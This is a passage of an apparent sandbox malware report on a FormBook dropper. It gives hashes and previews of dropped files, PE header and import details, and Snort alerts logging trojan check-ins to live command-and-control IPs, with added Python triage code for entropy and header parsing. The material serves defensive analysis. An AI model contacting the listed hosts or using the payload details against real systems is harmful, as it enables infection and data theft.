                                                                                                                  Process:C:\Users\user\Desktop\WXs8v9QuE7.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):10752
                                                                                                                  Entropy (8bit):5.7425597599083344
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:uv+cJZE61KRWJQO6tFiUdK7ckK4k7l1XRBm0w+NiHi1GSJ:uf6rtFRduQ1W+fG8
                                                                                                                  MD5:56A321BD011112EC5D8A32B2F6FD3231
                                                                                                                  SHA1:DF20E3A35A1636DE64DF5290AE5E4E7572447F78
                                                                                                                  SHA-256:BB6DF93369B498EAA638B0BCDC4BB89F45E9B02CA12D28BCEDF4629EA7F5E0F1
                                                                                                                  SHA-512:5354890CBC53CE51081A78C64BA9C4C8C4DC9E01141798C1E916E19C5776DAC7C82989FAD0F08C73E81AABA332DAD81205F90D0663119AF45550B97B338B9CC3
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 0%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: New Order.exe, Detection: malicious
                                                                                                                  • Filename: hesaphareketi-0.exe, Detection: malicious
                                                                                                                  • Filename: 0FKzNO1g3P.exe, Detection: malicious
                                                                                                                  • Filename: mlzHNUHkUl.exe, Detection: malicious
                                                                                                                  • Filename: Ejima.exe, Detection: malicious
                                                                                                                  • Filename: UrgentNewOrder_pdf.exe, Detection: malicious
                                                                                                                  • Filename: Swift 001.exe, Detection: malicious
                                                                                                                  • Filename: DHL DOCUMENTS.exe, Detection: malicious
                                                                                                                  • Filename: DHL Shipment Documents.exe, Detection: malicious
                                                                                                                  • Filename: 20210622-kll98374.exe, Detection: malicious
                                                                                                                  • Filename: SKMTC_STOMANAS_7464734648592848Ordengdoc.exe, Detection: malicious
                                                                                                                  • Filename: Orden de compra.exe, Detection: malicious
                                                                                                                  • Filename: Pending delivery - Final Attempt.exe, Detection: malicious
                                                                                                                  • Filename: 2bni49vTpt.exe, Detection: malicious
                                                                                                                  • Filename: rJIeeo2B7Q.exe, Detection: malicious
                                                                                                                  • Filename: e-hesap bildirimi.exe, Detection: malicious
                                                                                                                  • Filename: Draft Booking Confirmation 062120297466471346.exe, Detection: malicious
                                                                                                                  • Filename: HalkbankEkstre0609202138711233847204.exe, Detection: malicious
                                                                                                                  • Filename: 232.exe, Detection: malicious
                                                                                                                  • Filename: Yeni Siparis.exe, Detection: malicious
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j....l.9..i....l.Richm.........................PE..L...X:.V...........!.................).......0...............................`......................................p2......t0..P............................P.......................................................0..X............................text............................... ..`.rdata.......0......."..............@..@.data...d....@.......&..............@....reloc.......P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\pplsesniiplv
                                                                                                                  Process:C:\Users\user\Desktop\WXs8v9QuE7.exe
                                                                                                                  File Type:DOS executable (COM)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):57846
                                                                                                                  Entropy (8bit):5.240875887817307
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:Zc9QIQ54j6sW73BMrCd2BclVgMcGgN6oRD5nh:Zc9QIa4j6d7erC0BckMe6oBZh
                                                                                                                  MD5:81393E5DFDC6C78B387092FCE17F9D54
                                                                                                                  SHA1:3BC2E5FD9A8A81E848454C86350FD25117630A2D
                                                                                                                  SHA-256:2FC1AC7718451BC6863DFF20A20EFEAB36E68F0E7D1326C98347EC8837E8DADC
                                                                                                                  SHA-512:99C3294312C19C338C650A51861B53BF8A3F73FBA92A64C200F7A39BDA30A72F88F214F8F966752F0CDA6223FBC19DB1D2E2B359AB28B9E769D79943A06AB43A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview: .....U..H.......S..........e...............E.;.E.-.E...E.r.E.s.e..PS......;....+.....+..................5.........z.........J.......q+...-....+....................0.........+.3...Y..H......+.-....+._.......E...C3....J....#....g.....*........;..S+....+.._................j.t....0........-....3...O...+..........m..j.,.....+.+..............3...+.+....\..........B....}.....i+.3..63..n.......X+.+.3.....-......-.................+...q+.3..Z-......w........2.......;........3........ ........3.+.5....5......X[PS......;....+.....+..................5.........z.........J.......q+...-....+....................0.........+.3...Y..H......+.-....+._.......E...C3....J....#....g.....*........;..S+....+.._................j.t....0........-....3...O...+..........m..j.,.....+.+..............3...+.+....\..........B....}.....i+.3..63..n.......X+.+.3.....-......-.................+...q+.3..Z-......w........2.......;........3........ ........3.+.5....5...
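The three drops above are described by size, 8-bit entropy and a set of hashes, and the first of them (fy9bu4fvmp6z54he, typed only as "data") sits at 7.989 bits per byte, essentially the 8.0 ceiling. That is what compressed or encrypted content looks like whatever the report's "Encrypted: false" flag says, and it is the blob a practitioner would expect the NSIS stub to decrypt into the FormBook payload. The Python below is an added example, not part of the Joe Sandbox report, that recomputes those per-file fields for arbitrary input and flags high-entropy drops; the 7.5 threshold and the sample inputs are the editor's own constructions, not values from the page.

```python
"""Added example (not from the Joe Sandbox report): recompute the fields the
'Created / dropped Files' section prints for each drop (size, 8-bit Shannon
entropy, MD5 / SHA-1 / SHA-256 / SHA-512) and flag blobs whose entropy is near
the 8.0 ceiling, as fy9bu4fvmp6z54he (7.989) is in this analysis."""
import hashlib
import math
from collections import Counter
from typing import Dict, Union

# Assumed triage threshold (editor's choice, not a value from the report):
# plain text sits around 4-5 bits/byte, native x86 code around 6-6.5,
# compressed or encrypted data almost always above 7.5.
HIGH_ENTROPY = 7.5


def shannon_entropy_8bit(data: bytes) -> float:
    """Bits per byte, the same 'Entropy (8bit)' measure the report prints."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def describe_drop(data: bytes) -> Dict[str, Union[int, float, str, bool]]:
    """One triage record in the same shape as the report's file entries.

    Hashes are upper-cased to match the report's formatting.
    """
    ent = shannon_entropy_8bit(data)
    return {
        "size": len(data),
        "entropy": round(ent, 6),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
        "high_entropy": ent >= HIGH_ENTROPY,
    }


# Constructed inputs (the real dropped files' bytes are not on the page):
# every byte value equally likely gives exactly 8.0 bits/byte, a constant
# run gives 0.0, and English text lands around 4.
CONSTRUCTED_UNIFORM = bytes(range(256)) * 64
CONSTRUCTED_ZEROS = b"\x00" * 4096
CONSTRUCTED_TEXT = b"This program cannot be run in DOS mode"

if __name__ == "__main__":
    for name, blob in (("uniform", CONSTRUCTED_UNIFORM),
                       ("zeros", CONSTRUCTED_ZEROS),
                       ("text", CONSTRUCTED_TEXT)):
        rec = describe_drop(blob)
        print(f"{name:8} size={rec['size']:6} entropy={rec['entropy']:.6f} "
              f"high_entropy={rec['high_entropy']} sha256={rec['sha256'][:16]}...")
```

Run it against the files in `%TEMP%` after detonation (read them as bytes and pass them to `describe_drop`) and the record for the 164863-byte blob should reproduce the hashes and entropy listed above; anything else the stub writes with entropy above the threshold and no recognisable header deserves the same treatment as a candidate encrypted payload.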

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                  Entropy (8bit):7.882592624518728
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:WXs8v9QuE7.exe
                                                                                                                  File size:205564
                                                                                                                  MD5:1f45b0e2bd669bce49b2140373243a91
                                                                                                                  SHA1:6ea61f1b39548a8b9192c0606d6daeb2c071a190
                                                                                                                  SHA256:ef05dd27e2dc499d3c1f42f00525fea7204735acd45c7a03efb78a241a9f9660
                                                                                                                  SHA512:9ef1e51fd0ec8445842d70e6d71b555e11b4278c0ba7e32d2c5ea65ff0f6a7933d859ad68fa14530b589dde81c475849e1b1eb7ea575179267a98c7a55441f76
                                                                                                                  SSDEEP:3072:ABynOpL12rioc6MPPUFMG4F/IKyhLoKFvqu2w8mSAnBdcgOe9sAKwWE:ABlL/bHgMGm/WiKVquYmfdaIsOX
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                                                                                                  File Icon

                                                                                                                  Icon Hash:b2a88c96b2ca6a72

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x4030fb
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:b76363e9cb88bf9390860da8e50999d2
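The fields above come straight out of the PE headers. The Python below is an added example, not part of the Joe Sandbox report or its tooling, that decodes them with struct alone: the entrypoint as image base plus AddressOfEntryPoint, the link-time TimeDateStamp 0x56FF3A65 rendered as UTC, the subsystem, the file and DLL characteristics by name, and the hardening opt-ins the sample lacks (RELOCS_STRIPPED together with no DYNAMIC_BASE and no NX_COMPAT means the stub neither opts in to ASLR nor to DEP, which is common for NSIS installer stubs). Because the sample's bytes are not on the page, the header it parses is constructed inline to carry exactly the values listed above; it is not the real file. Import Hash is left out because it needs the import directory, which this header-only parser does not walk.

```python
"""Added example (not from the Joe Sandbox report): decode the 'Static PE Info'
fields from raw PE32 headers and list missing exploit-mitigation opt-ins.
The sample header at the bottom is constructed from the report's values."""
import struct
from datetime import datetime, timezone
from typing import Dict, List, Union

MACHINES = {0x14C: "Intel 80386", 0x8664: "x86-64"}
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED", 0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED", 0x2000: "DLL",
}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x1000: "APPCONTAINER",
    0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {1: "native", 2: "windows gui", 3: "windows cui"}

# IMAGE_FILE_HEADER, and the PE32 optional header up to DllCharacteristics.
COFF_FMT = "<HHIIIHH"
OPT_FMT = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH"


def flag_names(value: int, table: Dict[int, str]) -> List[str]:
    """Expand a bit field into the names used in the report, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_header(data: bytes) -> Dict[str, Union[int, str, List[str]]]:
    """Parse a PE32 image header; raises ValueError for anything else."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (machine, _nsect, timestamp, _symtab, _nsyms, _optsize,
     characteristics) = struct.unpack_from(COFF_FMT, data, e_lfanew + 4)
    opt = struct.unpack_from(OPT_FMT, data, e_lfanew + 24)
    if opt[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry_rva, image_base = opt[6], opt[9]
    os_major, os_minor = opt[12], opt[13]
    subsystem, dll_chars = opt[22], opt[23]

    gaps = []  # mitigation opt-ins a loader would honour but this image lacks
    if characteristics & 0x0001:
        gaps.append("RELOCS_STRIPPED: image cannot be rebased, so ASLR is impossible")
    if not (dll_chars & 0x0040):
        gaps.append("no DYNAMIC_BASE: does not opt in to ASLR")
    if not (dll_chars & 0x0100):
        gaps.append("no NX_COMPAT: does not opt in to DEP")

    return {
        "machine": MACHINES.get(machine, f"unknown (0x{machine:X})"),
        "entrypoint": image_base + entry_rva,
        "imagebase": image_base,
        "subsystem": SUBSYSTEMS.get(subsystem, f"unknown ({subsystem})"),
        "characteristics": flag_names(characteristics, FILE_CHARACTERISTICS),
        "dll_characteristics": flag_names(dll_chars, DLL_CHARACTERISTICS),
        "timestamp": datetime.fromtimestamp(timestamp, tz=timezone.utc)
                             .strftime("%Y-%m-%d %H:%M:%S UTC"),
        "os_version": f"{os_major}.{os_minor}",
        "hardening_gaps": gaps,
    }


def build_constructed_header() -> bytes:
    """Synthetic header carrying the report's values (constructed, not the sample)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)   # e_lfanew = 0x80
    dos += b"\0" * (0x80 - len(dos))
    coff = b"PE\0\0" + struct.pack(COFF_FMT, 0x14C, 5, 0x56FF3A65, 0, 0, 0xE0, 0x010F)
    opt = struct.pack(OPT_FMT, 0x10B, 6, 0,
                      0x6000, 0x2C000, 0x1000,   # code / data sizes (arbitrary)
                      0x30FB, 0x1000, 0x7000,    # AddressOfEntryPoint, BaseOfCode, BaseOfData
                      0x400000, 0x1000, 0x200,   # ImageBase, section and file alignment
                      4, 0, 4, 0, 4, 0,          # OS, image and subsystem versions 4.0
                      0, 0x38000, 0x400, 0,      # Win32VersionValue, SizeOfImage, SizeOfHeaders, CheckSum
                      2, 0x8000)                 # windows gui, TERMINAL_SERVER_AWARE only
    return dos + coff + opt + b"\0" * (0xE0 - len(opt))


CONSTRUCTED_HEADER = build_constructed_header()

if __name__ == "__main__":
    for key, value in parse_pe_header(CONSTRUCTED_HEADER).items():
        print(f"{key:20} {value:#x}" if isinstance(value, int) else f"{key:20} {value}")
```

Point `parse_pe_header` at the bytes of WXs8v9QuE7.exe and the output should match the table above line for line; the `hardening_gaps` list is the part the report does not spell out, and it is why process-hollowing a payload into a stub like this meets no ASLR on the stub's own image.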

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+20h], ebx
mov dword ptr [esp+14h], 00409168h
mov dword ptr [esp+1Ch], ebx
mov byte ptr [esp+18h], 00000020h
call dword ptr [004070B0h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007FD268D34AA3h
push ebx
call 00007FD268D37884h
cmp eax, ebx
je 00007FD268D34A99h
push 00000C00h
call eax
mov esi, 00407280h
push esi
call 00007FD268D37800h
push esi
call dword ptr [00407108h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FD268D34A7Dh
push 0000000Dh
call 00007FD268D37858h
push 0000000Bh
call 00007FD268D37851h
mov dword ptr [00423F44h], eax
call dword ptr [00407038h]
push ebx
call dword ptr [0040726Ch]
mov dword ptr [00423FF8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041F4F0h
call dword ptr [0040715Ch]
push 0040915Ch
push 00423740h
call 00007FD268D37484h
call dword ptr [0040710Ch]
mov ebp, 0042A000h
push eax
push ebp
call 00007FD268D37472h
push ebx
call dword ptr [00407144h]

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7418 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d000 | 0xc80 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x27c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5aeb | 0x5c00 | False | 0.665123980978 | data | 6.42230569414 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1196 | 0x1200 | False | 0.458984375 | data | 5.20291736659 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1b038 | 0x600 | False | 0.432291666667 | data | 4.0475118296 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x25000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2d000 | 0xc80 | 0xe00 | False | 0.412109375 | data | 4.00712910454 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2d1d8 | 0x2e8 | data | English | United States
RT_DIALOG | 0x2d4c0 | 0x100 | data | English | United States
RT_DIALOG | 0x2d5c0 | 0x11c | data | English | United States
RT_DIALOG | 0x2d6e0 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2d740 | 0x14 | data | English | United States
RT_VERSION | 0x2d758 | 0x254 | data | |
RT_MANIFEST | 0x2d9b0 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
USER32.dll | SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Version Infos

Description | Data
LegalCopyright | lieutenant
FileVersion | 9.7.6.5
CompanyName | stone
LegalTrademarks | apologizes
Comments | firearms
ProductName | grandeur
FileDescription | undoubtedly
Translation | 0x0000 0x04e4

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/22/21-18:25:23.221652 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.5 | 75.2.124.199
06/22/21-18:25:23.221652 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.5 | 75.2.124.199
06/22/21-18:25:23.221652 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.5 | 75.2.124.199
06/22/21-18:25:28.712452 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49743 | 185.53.177.12 | 192.168.2.5
06/22/21-18:25:50.296525 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49750 | 80 | 192.168.2.5 | 23.225.101.32
06/22/21-18:25:50.296525 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49750 | 80 | 192.168.2.5 | 23.225.101.32
06/22/21-18:25:50.296525 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49750 | 80 | 192.168.2.5 | 23.225.101.32
06/22/21-18:25:55.696207 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49751 | 80 | 192.168.2.5 | 94.136.40.51
06/22/21-18:25:55.696207 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49751 | 80 | 192.168.2.5 | 94.136.40.51
06/22/21-18:25:55.696207 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49751 | 80 | 192.168.2.5 | 94.136.40.51
06/22/21-18:26:06.571907 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49753 | 34.102.136.180 | 192.168.2.5
06/22/21-18:26:27.789250 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49755 | 80 | 192.168.2.5 | 45.192.104.89
06/22/21-18:26:27.789250 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49755 | 80 | 192.168.2.5 | 45.192.104.89
06/22/21-18:26:27.789250 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49755 | 80 | 192.168.2.5 | 45.192.104.89

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 22, 2021 18:25:11.219217062 CEST | 49726 | 80 | 192.168.2.5 | 119.81.95.146
Jun 22, 2021 18:25:11.418889046 CEST | 80 | 49726 | 119.81.95.146 | 192.168.2.5
Jun 22, 2021 18:25:11.419002056 CEST | 49726 | 80 | 192.168.2.5 | 119.81.95.146
Jun 22, 2021 18:25:11.419150114 CEST | 49726 | 80 | 192.168.2.5 | 119.81.95.146
Jun 22, 2021 18:25:11.618474007 CEST | 80 | 49726 | 119.81.95.146 | 192.168.2.5
Jun 22, 2021 18:25:11.619210958 CEST | 80 | 49726 | 119.81.95.146 | 192.168.2.5
Jun 22, 2021 18:25:11.619240999 CEST | 80 | 49726 | 119.81.95.146 | 192.168.2.5
Jun 22, 2021 18:25:11.619385004 CEST | 49726 | 80 | 192.168.2.5 | 119.81.95.146
Jun 22, 2021 18:25:11.619438887 CEST | 49726 | 80 | 192.168.2.5 | 119.81.95.146
Jun 22, 2021 18:25:11.820360899 CEST | 80 | 49726 | 119.81.95.146 | 192.168.2.5
Jun 22, 2021 18:25:17.240540981 CEST | 49732 | 80 | 192.168.2.5 | 222.239.248.209
Jun 22, 2021 18:25:17.505656004 CEST | 80 | 49732 | 222.239.248.209 | 192.168.2.5
Jun 22, 2021 18:25:17.506846905 CEST | 49732 | 80 | 192.168.2.5 | 222.239.248.209
Jun 22, 2021 18:25:17.506963015 CEST | 49732 | 80 | 192.168.2.5 | 222.239.248.209
Jun 22, 2021 18:25:17.773952961 CEST | 80 | 49732 | 222.239.248.209 | 192.168.2.5
Jun 22, 2021 18:25:17.774080992 CEST | 80 | 49732 | 222.239.248.209 | 192.168.2.5
Jun 22, 2021 18:25:17.774117947 CEST | 80 | 49732 | 222.239.248.209 | 192.168.2.5
Jun 22, 2021 18:25:17.774319887 CEST | 49732 | 80 | 192.168.2.5 | 222.239.248.209
Jun 22, 2021 18:25:17.774372101 CEST | 49732 | 80 | 192.168.2.5 | 222.239.248.209
Jun 22, 2021 18:25:18.038943052 CEST | 80 | 49732 | 222.239.248.209 | 192.168.2.5
Jun 22, 2021 18:25:23.178512096 CEST | 49737 | 80 | 192.168.2.5 | 75.2.124.199
Jun 22, 2021 18:25:23.221335888 CEST | 80 | 49737 | 75.2.124.199 | 192.168.2.5
Jun 22, 2021 18:25:23.221569061 CEST | 49737 | 80 | 192.168.2.5 | 75.2.124.199
Jun 22, 2021 18:25:23.221652031 CEST | 49737 | 80 | 192.168.2.5 | 75.2.124.199
Jun 22, 2021 18:25:23.264619112 CEST | 80 | 49737 | 75.2.124.199 | 192.168.2.5
Jun 22, 2021 18:25:23.498655081 CEST | 80 | 49737 | 75.2.124.199 | 192.168.2.5
Jun 22, 2021 18:25:23.498703957 CEST | 80 | 49737 | 75.2.124.199 | 192.168.2.5
Jun 22, 2021 18:25:23.498946905 CEST | 49737 | 80 | 192.168.2.5 | 75.2.124.199
Jun 22, 2021 18:25:23.498977900 CEST | 49737 | 80 | 192.168.2.5 | 75.2.124.199
Jun 22, 2021 18:25:23.524998903 CEST | 80 | 49737 | 75.2.124.199 | 192.168.2.5
Jun 22, 2021 18:25:23.526283979 CEST | 49737 | 80 | 192.168.2.5 | 75.2.124.199
Jun 22, 2021 18:25:23.541776896 CEST | 80 | 49737 | 75.2.124.199 | 192.168.2.5
Jun 22, 2021 18:25:28.585988998 CEST | 49743 | 80 | 192.168.2.5 | 185.53.177.12
Jun 22, 2021 18:25:28.627732038 CEST | 80 | 49743 | 185.53.177.12 | 192.168.2.5
Jun 22, 2021 18:25:28.627933025 CEST | 49743 | 80 | 192.168.2.5 | 185.53.177.12
Jun 22, 2021 18:25:28.669863939 CEST | 80 | 49743 | 185.53.177.12 | 192.168.2.5
Jun 22, 2021 18:25:28.670067072 CEST | 49743 | 80 | 192.168.2.5 | 185.53.177.12
Jun 22, 2021 18:25:28.712395906 CEST | 80 | 49743 | 185.53.177.12 | 192.168.2.5
Jun 22, 2021 18:25:28.712451935 CEST | 80 | 49743 | 185.53.177.12 | 192.168.2.5
Jun 22, 2021 18:25:28.712490082 CEST | 80 | 49743 | 185.53.177.12 | 192.168.2.5
Jun 22, 2021 18:25:28.712666035 CEST | 49743 | 80 | 192.168.2.5 | 185.53.177.12
Jun 22, 2021 18:25:28.712698936 CEST | 49743 | 80 | 192.168.2.5 | 185.53.177.12
Jun 22, 2021 18:25:28.754615068 CEST | 80 | 49743 | 185.53.177.12 | 192.168.2.5
Jun 22, 2021 18:25:33.816914082 CEST | 49746 | 80 | 192.168.2.5 | 67.199.248.12
Jun 22, 2021 18:25:33.868442059 CEST | 80 | 49746 | 67.199.248.12 | 192.168.2.5
Jun 22, 2021 18:25:33.868536949 CEST | 49746 | 80 | 192.168.2.5 | 67.199.248.12
Jun 22, 2021 18:25:33.868663073 CEST | 49746 | 80 | 192.168.2.5 | 67.199.248.12
Jun 22, 2021 18:25:33.919959068 CEST | 80 | 49746 | 67.199.248.12 | 192.168.2.5
Jun 22, 2021 18:25:34.017278910 CEST | 80 | 49746 | 67.199.248.12 | 192.168.2.5
